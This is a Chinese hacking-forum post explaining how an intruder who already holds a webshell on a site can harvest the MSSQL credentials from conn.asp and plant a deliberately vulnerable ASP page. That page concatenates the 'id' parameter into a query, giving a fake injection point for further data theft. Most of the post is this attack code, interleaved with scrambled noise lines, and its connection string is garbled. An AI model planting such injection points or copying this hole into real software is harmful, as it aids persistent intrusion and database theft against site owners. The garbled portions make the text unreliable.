中国网络渗透测试联盟
标题:
自己构造注入点方便入侵
[打印本页]
作者:
admin
时间:
2012-9-13 17:27
标题:
自己构造注入点方便入侵
自己构造注入点方便入侵
. J5 I9 O& q+ ]/ L( F! D3 ~$ I
9 e: \$ ~, [, ]2 W7 K
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
( u6 E1 A% R. }
$ V" e8 X: ~6 i% z7 t5 y
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
! L2 D y G0 n1 ~
2 m8 N& g% P% d2 b
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
/ s/ T* a2 W* [5 K5 I
" e! p& M( Q3 Z6 ~% w, O& Y6 p. v
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
& |1 d) K5 W$ G, n! w/ m
2 ^ q4 A% M+ b# B8 E) Y
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
- w/ ?7 E, D2 N
+ K8 x! y0 l! r2 P8 `. C
程序代码
9 q2 P$ n% @* w. U, H; e
<!--#include file="xx.asp"-->
7 C) b& W$ r6 A) F' u, @+ M
<%
+ J) @# i: M/ C* v5 o( P
set rs=server.createobject("ADODB.recordset")
0 D6 K4 x" Z% u+ h0 ?7 ^) e5 C
id = request("id")
5 }' S/ G& Y1 A3 e- j4 [* X
strSQL = "select * from admin where id=" & id
4 Y: [" D0 H# @5 b1 K, n4 ?" ]; X, B
rs.open strSQL,conn,1,3
8 C) x4 P% Q. s7 P* G$ Y+ s
rs.close
8 }: v+ q9 j9 Z: v
%>
/ r. x& p9 q! \8 u: d2 X+ V
. e$ T1 o+ u- H" W! Q
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
) u3 r4 J5 r1 ?8 c$ w4 f- k' [
: O# s$ h# a5 Y2 A
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
T6 h- \5 k# i# ~ y
0 O1 W/ W9 n; p D# q* ^ K
然后就要构造一个连接数据库的文件了,代码如下:
6 k+ ^3 v! G4 [7 J: q( V
程序代码
) M0 e% m- q0 i9 ? p
<%
) z" h- J) O4 R# A w" J* x* b
strSQLServerName = "000.000.000.000" '服务器名称或地址
9 v4 W" {% `) Y1 [
strSQLDBUserName = "sqlname" '数据库帐号
: {+ K) M0 o; J4 Y
strSQLDBPassword = "sqlpass" '数据库密码
" Z) L! B; t8 V7 v
strSQLDBName = "sqldataname" '数据库名称
: F0 ?. K1 `9 m% T' y
Set conn = Server.CreateObject("ADODB.Connection")
+ N9 @4 J/ n; J+ b$ K
strCon = "
rovider=SQLOLEDB.1
ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "
assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
4 ^# A7 t: B% X1 {
conn.open strCon
5 M1 Z6 O% b1 f* V' L; Y
%>
0 Z; U: k2 ^# T# D) V0 ~ H
5 @5 P" v! a) m8 z- G
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
/ u8 R$ q5 _0 N* ?- C) w- J
1 W. n0 m" Z. B2 E: X- @; B
就这样,正常情况下,就OK了,伪造成功……
?3 ^5 I( [8 C0 R1 O" u
, @ M) Q# U/ G- g& A S x$ ]' |
如果有什么问题可以提出来大家一起探讨解决。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2